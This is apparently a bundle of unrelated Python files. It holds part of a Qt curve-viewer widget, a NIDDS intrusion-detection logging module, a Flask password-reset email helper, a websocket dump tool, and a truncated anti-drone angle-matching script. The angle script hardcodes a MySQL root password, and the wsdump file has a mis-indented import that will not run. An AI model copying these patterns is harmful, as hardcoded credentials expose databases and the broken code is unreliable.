        currentIndex = self.getCurrentCurveIndex(absolute=True)
        if currentIndex != index:
            # Do not update index if it is already OK
            self.setCurrentCurveIndex(index)
        elif index == len(self.getData(copy=False)) - 1:
            # Set to last curve
            self.setCurrentCurveIndex(-1)

    def setCurrentCurveIndex(self, index=-1):
        """Perform update when current curve changed

        :param int index:
            The index of the current curve in the array
            The index can be negative to start indexing from the end
            Default: -1 = Latest curve.
        """
        data = self.getData(copy=False)
        assert index in (-1, 0) or -len(data) <= index < len(data)
        self._index = index
        if self._index < 0:
            absoluteIndex = len(data) + self._index
        else:
            absoluteIndex = self._index
        # Keep both control widgets in sync with the new index.
        self._spinBox.setValue(absoluteIndex)
        self._slider.setValue(absoluteIndex)
        self._updateCurrentCurve()

    def getCurrentCurveIndex(self, absolute=False):
        """Returns the current curve index

        :param bool absolute:
            False (default) to get index as Python indexing (can be negative),
            True to get current index from the beginning of the data array (>= 0).
        :return: The index
        :rtype: int
        """
        if absolute and self._index < 0:  # Negative index is from the end
            return max(0, len(self.getData(copy=False)) + self._index)
        else:
            return self._index

    def _updateControlWidgets(self):
        """Update widgets controlling the current curve index"""
        nbCurves = len(self.getData(copy=False))
        if self.getCurrentCurveIndex() >= 0:
            index = nbCurves - 1
        else:
            index = nbCurves + self.getCurrentCurveIndex()
        self._slider.setRange(0, index)
        self._spinBox.setRange(0, index)
        # Controls are useless until at least one curve exists.
        self._slider.setEnabled(nbCurves > 0)
        self._spinBox.setEnabled(nbCurves > 0)
        self.setCurrentCurveIndex(self.getCurrentCurveIndex())

    def getData(self, copy=True):
        """Return displayed curves data

        :param bool copy: True to get a copy (default),
            False to get internal representation, do not modify.
        :return: A copy of the data currently displayed
        """
        if self._data is None:
            return numpy.array(()).reshape(0, 0)  # Empty 2D array
        else:
            return numpy.array(self._data, copy=copy)

    def appendCurves(self, data):
        """Add curve(s) to the plot.

        The data is always copied.
        This method can be called from any thread.

        :param numpy.ndarray data:
            If 1D, it is a curve to append to the plot.
            If 2D, it is a set of curves to append.
        """
        data = numpy.atleast_2d(numpy.array(data, copy=True))
        assert data.ndim == 2
        self._sigAppendCurves.emit(data)

    def _appendCurves(self, data):
        """Implements :meth:`appendCurves` in the main thread."""
        plot = self.getPlot()
        wasData = self._data is not None
        if self._data is None:
            if self._x is None:
                # No X set yet: default to sample indices.
                self._x = numpy.arange(data.shape[-1])
            assert len(self._x) == data.shape[-1]
            self._data = data
        else:
            assert self._data.shape[-1] == data.shape[-1]
            self._data = numpy.append(self._data, data, axis=0)
        self._updateControlWidgets()
        # Update plot background: filled max band, then min band over it,
        # then the mean curve on top.
        z = 1
        maxs = numpy.nanmax(self._data, axis=0)
        plot.addCurve(
            self.getXData(),
            maxs,
            legend="maximum",
            color="#D0D0D0",
            fill=True,
            z=z,
            linestyle="-",
            resetzoom=False,
        )
        z += 1
        mins = numpy.nanmin(self._data, axis=0)
        plot.addCurve(
            self.getXData(),
            mins,
            legend="minimum",
            color="#FFFFFF",
            fill=True,
            z=z,
            linestyle="-",
            resetzoom=False,
        )
        z += 1
        means = nanmean(self._data, axis=0)
        plot.addCurve(
            self.getXData(),
            means,
            legend="mean",
            color="#FFFFFF80",
            linewidth=2,
            linestyle="-",
            z=1000,
            resetzoom=False,
        )
        # Draw current curve
        self._updateCurrentCurve()
        if not wasData:
            # First data set: fit the view once.
            self.resetZoom()

    def resetZoom(self):
        """Reset Plot zoom"""
        self.getPlot().resetZoom()
if __name__ == "__main__":
    # Demo: show the widget and feed it noisy sine curves from a thread.
    import glob
    import threading
    import time

    # dummy data
    x = numpy.linspace(0.0, 10.0, 1024)
    y = numpy.sin(x) + 2
    data = y[numpy.newaxis, :] + numpy.random.normal(0, 0.1, (1024, len(y)))
    app = qt.QApplication([])
    w = CurvesView()
    # w.setAttribute(qt.Qt.WA_DeleteOnClose)
    w.show()
    w.setXData(x)
    w.appendCurves(data)
    w.resetZoom()
    running = True

    def addCurves():
        # Periodically append one curve to exercise the cross-thread API.
        index = 0
        while running:
            time.sleep(0.5)
            w.appendCurves(data[index % len(data)])
            index += 1

    thread = threading.Thread(target=addCurves)
    thread.start()
    app.exec_()
    print("closing...")
    if thread:
        # Signal the feeder loop to stop and wait briefly for it to exit.
        running = False
        thread.join(2)
|
log.py | #!/usr/bin/env python
"""
Copyright (c) 2020 NIDDS developers (https://github.com/prasanthc41m/nidds/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import datetime
import os
import re
import signal
import socket
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.compat import xrange
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import UNICODE_ENCODING
from core.settings import VERSION
from core.ignore import ignore_event
from thirdparty.six.moves import socketserver as _socketserver
# Module-level state shared by the logging helpers below.
_condensed_events = {}  # (src_ip, trail) -> list of buffered event tuples awaiting condensing
_condensing_thread = None  # background thread running flush_condensed_events()
_condensing_lock = threading.Lock()  # guards _condensed_events
_single_messages = set()  # messages already emitted via log_error(..., single=True)
_thread_data = threading.local()  # per-thread log handles and throttling state
def create_log_directory():
    """Ensure config.LOG_DIR exists, creating it (mode 0o755) when missing."""
    directory = config.LOG_DIR
    if not os.path.isdir(directory):
        sudo_missing = not config.DISABLE_CHECK_SUDO and check_sudo() is False
        if sudo_missing:
            exit("[!] please rerun with sudo/Administrator privileges")
        os.makedirs(directory, 0o755)
    print("[i] using '%s' for log storage" % directory)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
    """Return an OS-level handle for the daily event log covering timestamp *sec*.

    With reuse=True (default) the handle is cached per thread and only
    reopened when the date — hence the file name — changes. With reuse=False
    a fresh handle is returned and the caller must close it.
    """
    localtime = time.localtime(sec)
    path = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
    if not reuse:
        if not os.path.exists(path):
            open(path, "w+").close()
            os.chmod(path, DEFAULT_EVENT_LOG_PERMISSIONS)
        return os.open(path, flags)
    if path != getattr(_thread_data, "event_log_path", None):
        # Date rolled over (or first use on this thread): close the stale
        # handle and open the new day's file.
        if getattr(_thread_data, "event_log_handle", None):
            try:
                os.close(_thread_data.event_log_handle)
            except OSError:
                pass
        if not os.path.exists(path):
            open(path, "w+").close()
            os.chmod(path, DEFAULT_EVENT_LOG_PERMISSIONS)
        _thread_data.event_log_path = path
        _thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
    return _thread_data.event_log_handle
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
    """Return a per-thread cached OS-level handle to the error log file."""
    if not hasattr(_thread_data, "error_log_handle"):
        path = os.path.join(config.get("LOG_DIR") or os.curdir, "error.log")
        if not os.path.exists(path):
            # Create the file first so permissions can be fixed before use.
            open(path, "w+").close()
            os.chmod(path, DEFAULT_ERROR_LOG_PERMISSIONS)
        _thread_data.error_log_path = path
        _thread_data.error_log_handle = os.open(path, flags)
    return _thread_data.error_log_handle
def safe_value(value):
    """Render *value* for space-separated log output.

    Falsy values become '-'; values containing a space or a double quote are
    wrapped in double quotes with embedded quotes doubled (CSV style); any
    CR/LF characters are then flattened to spaces.
    """
    text = str(value or '-')
    needs_quoting = ' ' in text or '"' in text
    if needs_quoting:
        text = "\"%s\"" % text.replace('"', '""')
    return re.sub(r"[\x0a\x0d]", " ", text)
def flush_condensed_events(single=False):
    """Merge buffered duplicate events and emit them through log_event().

    Runs as an endless daemon loop, sleeping CONDENSED_EVENTS_FLUSH_PERIOD
    between passes, unless single=True in which case exactly one flush is
    performed.
    """
    while True:
        if not single:
            time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
        with _condensing_lock:
            for key in _condensed_events:
                condensed = False
                events = _condensed_events[key]
                first_event = events[0]
                # Mutable working copy of the first event tuple.
                condensed_event = [_ for _ in first_event]
                for i in xrange(1, len(events)):
                    current_event = events[i]
                    for j in xrange(3, 7):  # src_port, dst_ip, dst_port, proto
                        if current_event[j] != condensed_event[j]:
                            condensed = True
                            # Collect differing values of this field into a set.
                            if not isinstance(condensed_event[j], set):
                                condensed_event[j] = set((condensed_event[j],))
                            condensed_event[j].add(current_event[j])
                if condensed:
                    # Render each merged field as a sorted comma-joined string.
                    for i in xrange(len(condensed_event)):
                        if isinstance(condensed_event[i], set):
                            condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
                log_event(condensed_event, skip_condensing=True)
            _condensed_events.clear()
        if single:
            break
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
    """Record a detection event to local logs and/or remote log servers.

    :param event_tuple: (sec, usec, src_ip, src_port, dst_ip, dst_port, proto,
        trail_type, trail, info, reference)
    :param packet: raw packet, forwarded to plugin functions only
    :param skip_write: when True, skip all log writing (plugins still run)
    :param skip_condensing: when True, bypass the duplicate-condensing buffer
    """
    global _condensing_thread
    # Lazily start the daemon thread that flushes condensed duplicates.
    if _condensing_thread is None:
        _condensing_thread = threading.Thread(target=flush_condensed_events)
        _condensing_thread.daemon = True
        _condensing_thread.start()
    try:
        sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
        if ignore_event(event_tuple):
            return
        if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS):  # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
            if not skip_write:
                localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
                if not skip_condensing:
                    if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
                        # Buffer this event; flush_condensed_events() merges
                        # and re-emits it with skip_condensing=True.
                        with _condensing_lock:
                            key = (src_ip, trail)
                            if key not in _condensed_events:
                                _condensed_events[key] = []
                            _condensed_events[key].append(event_tuple)
                        return
                current_bucket = sec // config.PROCESS_COUNT
                if getattr(_thread_data, "log_bucket", None) != current_bucket:  # log throttling
                    _thread_data.log_bucket = current_bucket
                    _thread_data.log_trails = set()
                else:
                    # Same time bucket: drop repeats of the same (ip, trail).
                    if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
                        return
                    else:
                        _thread_data.log_trails.add((src_ip, trail))
                        _thread_data.log_trails.add((dst_ip, trail))
                event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
                if not config.DISABLE_LOCAL_LOG_STORAGE:
                    handle = get_event_log_handle(sec)
                    os.write(handle, event.encode(UNICODE_ENCODING))
                if config.LOG_SERVER:
                    if config.LOG_SERVER.count(':') > 1:
                        # More than one ':' implies an IPv6 address (e.g. "[::1]:8337").
                        remote_host, remote_port = config.LOG_SERVER.replace('[', '').replace(']', '').rsplit(':', 1)
                        # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
                        _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
                        _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
                        _address = socket.getaddrinfo(remote_host, int(remote_port) if str(remote_port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
                    else:
                        remote_host, remote_port = config.LOG_SERVER.split(':')
                        _address = (remote_host, int(remote_port))
                    # Events are forwarded over UDP, prefixed with the timestamp.
                    s = socket.socket(socket.AF_INET if len(_address) == 2 else socket.AF_INET6, socket.SOCK_DGRAM)
                    s.sendto(("%s %s" % (sec, event)).encode(UNICODE_ENCODING), _address)
                if config.SYSLOG_SERVER:
                    # CEF-formatted copy sent to the syslog server over UDP.
                    extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
                    _ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(config.TRAILS_FILE))), name=info, severity=0, extension=extension)
                    remote_host, remote_port = config.SYSLOG_SERVER.split(':')
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    s.sendto(_.encode(UNICODE_ENCODING), (remote_host, int(remote_port)))
                if (config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER))) or config.console:
                    # Nowhere else to write (or console mode): dump to stderr.
                    sys.stderr.write(event)
                    sys.stderr.flush()
            if config.plugin_functions:
                for _ in config.plugin_functions:
                    _(event_tuple, packet)
    except (OSError, IOError):
        if config.SHOW_DEBUG:
            traceback.print_exc()
def log_error(msg, single=False):
    """Append *msg* to the error log; with single=True each distinct message is logged once."""
    if single:
        if msg in _single_messages:
            return
        _single_messages.add(msg)
    try:
        handle = get_error_log_handle()
        line = "%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg)
        os.write(handle, line.encode(UNICODE_ENCODING))
    except (OSError, IOError):
        if config.SHOW_DEBUG:
            traceback.print_exc()
def start_logd(address=None, port=None, join=False):
    """Start the UDP log-collecting server.

    :param address: bind address (IPv6 accepted in "[...]" form)
    :param port: bind port (numeric string or int)
    :param join: when True, serve in the calling thread (blocking);
        otherwise serve from a daemon thread and return immediately.
    """
    class ThreadingUDPServer(_socketserver.ThreadingMixIn, _socketserver.UDPServer):
        pass

    class UDPHandler(_socketserver.BaseRequestHandler):
        def handle(self):
            try:
                data, _ = self.request
                if data[0:1].isdigit():  # Note: regular format with timestamp in front
                    sec, event = data.split(b' ', 1)
                else:  # Note: naive format without timestamp in front
                    # Derive the epoch seconds from the event's own time field.
                    event_date = datetime.datetime.strptime(data[1:data.find(b'.')].decode(UNICODE_ENCODING), TIME_FORMAT)
                    sec = int(time.mktime(event_date.timetuple()))
                    event = data
                if not event.endswith(b'\n'):
                    event = b"%s\n" % event
                # reuse=False: handlers run concurrently, each gets its own fd.
                handle = get_event_log_handle(int(sec), reuse=False)
                os.write(handle, event)
                os.close(handle)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

    # IPv6 support
    if ':' in (address or ""):
        address = address.strip("[]")
        _socketserver.UDPServer.address_family = socket.AF_INET6
        # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
        _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
        _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
        _address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
    else:
        _address = (address or '', int(port) if str(port or "").isdigit() else 0)
    server = ThreadingUDPServer(_address, UDPHandler)
    print("[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1]))
    if join:
        server.serve_forever()
    else:
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
def set_sigterm_handler():
    """Install a SIGTERM handler that logs the signal and exits cleanly."""
    if not hasattr(signal, "SIGTERM"):
        return  # platform without SIGTERM support

    def _on_sigterm(signum, frame):
        log_error("SIGTERM")
        raise SystemExit

    signal.signal(signal.SIGTERM, _on_sigterm)
if __name__ != "__main__":
    # Installed on import so embedding processes shut down gracefully on SIGTERM.
    set_sigterm_handler()
|
email.py | from flask_mail import Message
from app import app,mail
from flask import render_template
from threading import Thread
from flask_babel import _
# def send_mail(subject, sender, recipients, text_body, html_body):
# msg = Message(subject, sender=sender, recipients=recipients)
# msg.body = text_body
# msg.html = html_body
# mail.send(msg)
def send_async_email(app, msg):
    """Send *msg* from a worker thread, inside the given Flask app's context."""
    with app.app_context():
        mail.send(msg)
def send_mail(subject, sender, recipients, text_body, html_body):
    """Compose an email and dispatch it on a background thread (non-blocking)."""
    message = Message(subject, sender=sender, recipients=recipients)
    message.body = text_body
    message.html = html_body
    Thread(target=send_async_email, args=(app, message)).start()
def send_password_reset_email(user):
    """Email *user* a password-reset message containing a signed token."""
    token = user.get_reset_password_token()
    send_mail(
        _('[Microblog] Reset Your Password'),
        sender=app.config['ADMINS'][0],
        recipients=[user.email],
        # Plain-text and HTML bodies rendered from the reset templates.
        text_body=render_template('email/reset_password.txt', user=user, token=token),
        html_body=render_template('email/reset_password.html', user=user, token=token)
    )
|
wsdump.py | #!/Users/mgallagher/copycatbot/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return the lower-cased encoding of stdin, defaulting to "utf-8"."""
    encoding = getattr(sys.stdin, "encoding", "")
    return encoding.lower() if encoding else "utf-8"
# WebSocket opcodes whose frames carry payload data.
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# Console encoding used to transcode user input.
ENCODING = get_encoding()
class VAction(argparse.Action):
    """argparse action for verbosity: bare flag -> 1, integer -> as given,
    any other value -> number of 'v' characters plus one (e.g. "vv" -> 3)."""

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            values = "1"
        try:
            level = int(values)
        except ValueError:
            level = values.count("v") + 1
        setattr(args, self.dest, level)
def parse_args(argv=None):
    """Build and run the wsdump command-line parser.

    :param argv: optional list of argument strings; defaults to sys.argv[1:].
        Added (backward-compatibly) so the parser can be exercised without
        mutating sys.argv.
    :return: argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    parser.add_argument("url", metavar="ws_url",
                        help="websocket url. ex. ws://echo.websocket.org/")
    parser.add_argument("-p", "--proxy",
                        help="proxy url. ex. http://127.0.0.1:8080")
    parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                        dest="verbose",
                        help="set verbose mode. If set to 1, show opcode. "
                        "If set to 2, enable to trace websocket module")
    parser.add_argument("-n", "--nocert", action='store_true',
                        help="Ignore invalid SSL cert")
    parser.add_argument("-r", "--raw", action="store_true",
                        help="raw output")
    parser.add_argument("-s", "--subprotocols", nargs='*',
                        help="Set subprotocols")
    parser.add_argument("-o", "--origin",
                        help="Set origin")
    parser.add_argument("--eof-wait", default=0, type=int,
                        help="wait time(second) after 'EOF' received.")
    parser.add_argument("-t", "--text",
                        help="Send initial text")
    parser.add_argument("--timings", action="store_true",
                        help="Print timings in seconds")
    parser.add_argument("--headers",
                        help="Set custom headers. Use ',' as separator")
    return parser.parse_args(argv)
class RawInput:
    """Prompted line input, normalised to UTF-8 bytes across Python 2/3."""

    def raw_input(self, prompt):
        reader = input if six.PY3 else raw_input
        line = reader(prompt)
        if isinstance(line, six.text_type):
            line = line.encode("utf-8")
        elif ENCODING and ENCODING != "utf-8":
            # Python 2 byte string in a non-UTF-8 console: transcode.
            line = line.decode(ENCODING).encode("utf-8")
        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """REPL-style console that prints incoming messages above a "> " prompt."""

    def write(self, data):
        # Clear the current line, print the message in blue, restore the prompt.
        out = sys.stdout
        out.write("\033[2K\033[E")
        out.write("\033[34m< " + data + "\033[39m")
        out.write("\n> ")
        out.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain line-oriented console for raw (non-interactive) output."""

    def write(self, data):
        sys.stdout.write(data + "\n")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to the websocket URL, dump incoming frames from a reader
    thread, and relay console input to the peer until interrupted/EOF."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # Disable certificate validation (insecure; testing only).
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = map(str.strip, args.headers.split(','))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        # Receive one frame; answer control frames (close/ping) in-protocol.
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data

    def recv_ws():
        # Reader loop: print every received message until the peer closes.
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if not args.verbose and opcode in OPCODE_DATA:
                msg = data
            elif args.verbose:
                # Verbose mode: prefix each message with its opcode name.
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    # Writer loop: forward console lines until Ctrl+C or EOF.
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # NOTE(review): swallows the traceback; only the message is printed.
        print(e)
|
SelectAngle_Serial1121 - udp.py | # encoding=utf-8
import socket # 引入套接字
import threading # 引入并行
import pymysql
import struct
import serial
import matplotlib.pyplot as plt
import datetime
import math
import sys,os
sys.path.append(r'D:\OneDrive\Python_project\Github\AntiUAV_Python\Python')
# from DBInfo import *
plt.ion()  # enable interactive (non-blocking) plotting
ax1 = []  # x-axis sample buffer for the single-channel plot
ax2 = []  # x-axis sample buffer for the 4-channel plot
ach1 = []  # y-axis buffer, channel 1
ach2 = []  # y-axis buffer, channel 2
ach3 = []  # y-axis buffer, channel 3
ach4 = []  # y-axis buffer, channel 4
ach = []  # matched-angle history buffer
count_time = 0  # number of processed samples (drives DataProcess smoothing)
Last_rawdata = 0  # previous matched angle
Process_data = 0  # latest matched angle
ch1_db_data = []  # calibration table, channel 1 (loaded from MySQL)
ch2_db_data = []  # calibration table, channel 2
ch3_db_data = []  # calibration table, channel 3
ch4_db_data = []  # calibration table, channel 4
matched_angle_buff = []  # recent matched angles awaiting averaging
matched_angle = 0  # most recent matched angle
matched_angle_mid = 0  # averaged (smoothed) matched angle
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # rebound in main()
angle_db_data = []  # calibration table angle column
'''
##
@brief: calibration lookup function (see SelectAngle below)
@param:
    ch1_raw_data: channel 1 sample
    ch2_raw_data: channel 2 sample
    ch3_raw_data: channel 3 sample
    ch4_raw_data: channel 4 sample
@retval:
    the angle obtained from the lookup table
##
'''
def Print4(counnt, ch1_data, ch2_data, ch3_data, ch4_data, angle):
    """Live-plot the four channel amplitudes (top) and the matched angle (bottom).

    Appends the new sample to the module-level buffers and redraws the figure.
    """
    data = datetime.date.today()
    plt.figure("4 Channel&Matched Angle" + str(data))
    ax2.append(counnt)  # x-axis: sample counter
    ach1.append(ch1_data)
    ach2.append(ch2_data)
    ach3.append(ch3_data)
    ach4.append(ch4_data)
    ach.append(angle)
    plt.clf()  # clear the previous drawing
    plt.subplot(2, 1, 1)
    plt.plot(ax2, ach1, label="CH1")  # plot the buffered channel histories
    plt.plot(ax2, ach2, label="CH2")
    plt.plot(ax2, ach3, label="CH3")
    plt.plot(ax2, ach4, label="CH4")
    plt.title('Channel Data')
    plt.xlabel("Time")
    plt.ylabel("Normalized Amplitude")
    plt.grid(True)
    plt.subplot(2, 1, 2)
    plt.plot(ax2, ach, label="Matched Angle")
    plt.title('Angle')
    plt.xlabel("Time")
    plt.ylabel("Angle")
    plt.grid(True)
    plt.pause(0.08)  # brief pause so the GUI event loop can redraw
    # plt.ioff()  # would close the interactive plotting window
def DataProcess(count, angle_now, angle_last):
    """Rate-limit angle jumps: a change of 20 or more is clamped to +/-10.

    The very first sample (count == 0) is passed through unchanged.
    """
    if count == 0:
        return angle_now
    delta = angle_now - angle_last
    if abs(delta) < 20:
        return angle_now
    # Large jump: move at most 10 towards the new value.
    return angle_last + 10 if delta > 0 else angle_last - 10
def Print1(counnt, ch_data):
    """Live-plot a single data channel.

    NOTE(review): the value is appended to ``ach`` but ``ach1`` is what gets
    plotted against ``ax1`` — if their lengths differ matplotlib raises.
    Looks unintended; confirm against Print4's buffers.
    """
    ax1.append(counnt)  # x-axis: sample counter
    ach.append(ch_data)
    plt.clf()  # clear the previous drawing
    plt.subplot(2, 1, 1)
    plt.plot(ax1, ach1)  # plot the buffered history
    plt.pause(0.1)
def SelectData():
    """Load the calibration table (ch1..ch4 and angle columns of final_table)
    from MySQL into the module-level ``*_db_data`` lists.

    NOTE(review): DB_IPAddr / DB_Name presumably come from the commented-out
    ``from DBInfo import *`` at the top of the file — as the file stands they
    are undefined and the broad except below silently skips loading; confirm
    the import.
    """
    global ch1_db_data
    global ch2_db_data
    global ch3_db_data
    global ch4_db_data
    global angle_db_data
    try:
        conn = pymysql.connect(host=DB_IPAddr, port=3306, db=DB_Name, user='root', passwd="123456",
                               charset='utf8')
        cs1 = conn.cursor()
        # One query per column; rows are index-aligned across the results.
        cs1.execute("select ch1 from final_table")
        result1 = cs1.fetchall()
        cs1.execute("select ch2 from final_table")
        result2 = cs1.fetchall()
        cs1.execute("select ch3 from final_table")
        result3 = cs1.fetchall()
        cs1.execute("select ch4 from final_table")
        result4 = cs1.fetchall()
        cs1.execute("select angle from final_table")
        result5 = cs1.fetchall()
        for i in range(len(result5)):
            ch1_db_data.append(float((result1[i])[0]))
            ch2_db_data.append(float((result2[i])[0]))
            ch3_db_data.append(float((result3[i])[0]))
            ch4_db_data.append(float((result4[i])[0]))
            angle_db_data.append(float((result5[i])[0]))
        conn.commit()
        cs1.close()
        conn.close()
    except Exception as e:
        print(e)
        pass
def SelectAngle(ch1_raw_data, ch2_raw_data, ch3_raw_data, ch4_raw_data):
    """Match the four raw channel amplitudes against the calibration table
    and return a rate-limited angle estimate.

    The raw values are normalised by the smallest channel, compared to each
    calibration row in log-ratio (dB) space, and the angle of the closest
    row is returned after DataProcess() smoothing.
    """
    global ch1_db_data
    global ch2_db_data
    global ch3_db_data
    global ch4_db_data
    # Normalise by the smallest channel value.
    min_ch_data = min(ch1_raw_data, ch2_raw_data, ch3_raw_data, ch4_raw_data)
    min_ch_data = float(min_ch_data)
    ch1_data = float(ch1_raw_data) / min_ch_data
    ch2_data = float(ch2_raw_data) / min_ch_data
    ch3_data = float(ch3_raw_data) / min_ch_data
    ch4_data = float(ch4_raw_data) / min_ch_data
    # After normalisation every ratio is >= 1, so the sum should exceed 4.
    if ch1_data + ch2_data + ch3_data + ch4_data <= 4:
        print("数据可能有误!\n数据可能有误!\n数据可能有误!\n数据可能有误!\n数据可能有误!")
    ch1_data = float(ch1_data)
    ch2_data = float(ch2_data)
    ch3_data = float(ch3_data)
    ch4_data = float(ch4_data)
    sum_difference = []
    for i in range(len(angle_db_data)):
        # Squared difference of pairwise channel ratios in dB (20*log10),
        # which amplifies small ratio differences.
        ch1ch2_difference = (20 * math.log((ch1_db_data[i] / ch2_db_data[i]), 10) - 20 * math.log((ch1_data / ch2_data),
                                                                                                 10)) ** 2
        ch2ch3_difference = (20 * math.log((ch2_db_data[i] / ch3_db_data[i]), 10) - 20 * math.log((ch2_data / ch3_data),
                                                                                                 10)) ** 2
        ch3ch4_difference = (20 * math.log((ch3_db_data[i] / ch4_db_data[i]), 10) - 20 * math.log((ch3_data / ch4_data),
                                                                                                 10)) ** 2
        sum_difference.append(ch1ch2_difference + ch2ch3_difference + ch3ch4_difference)
    global count_time
    global Last_rawdata
    global Process_data
    Last_rawdata = Process_data
    # Index of the best-matching calibration row -> its angle.
    Process_data = sum_difference.index(min(sum_difference))
    Process_data = angle_db_data[Process_data]
    result = DataProcess(count_time, Process_data, Last_rawdata)
    count_time += 1
    return result
def udp_send(udp_socket, BetaAngle):
    """Pack a tracking report containing *BetaAngle* and send it over UDP."""
    mhesIPAddr = '192.168.3.70'  # destination IP (CAAC Second Research Institute)
    mhesPort = 10002
    # destination port
    send_data_head = 0xb3b3  # frame header magic
    # NOTE(review): declared header length is 34 but the packed frame below
    # is larger — confirm against the protocol spec.
    send_data_headlen = 34
    send_data_latitude = 103+(45/60)/100+(20/3600)/10000
    send_data_longitude = 31+(7/60)/100+(2/3600)/10000
    send_data_height = 790
    send_data_tarqua = 1
    send_data_end = 0xb1af  # frame trailer magic (packed mid-struct per the format below)
    send_data_tracknum = 1
    send_data_trackdis = 0
    send_data_bata = BetaAngle
    send_data_alpha = 0
    send_data_trackrate = 0
    # Little-endian layout: H head, H headlen, 3*d lat/lon/height, I tarqua,
    # H end, i tracknum, 4*f trackdis/bata/alpha/trackrate.
    send_data = struct.pack('<HHdddIHiffff', send_data_head, send_data_headlen, send_data_latitude,
                            send_data_longitude, send_data_height, send_data_tarqua, send_data_end,
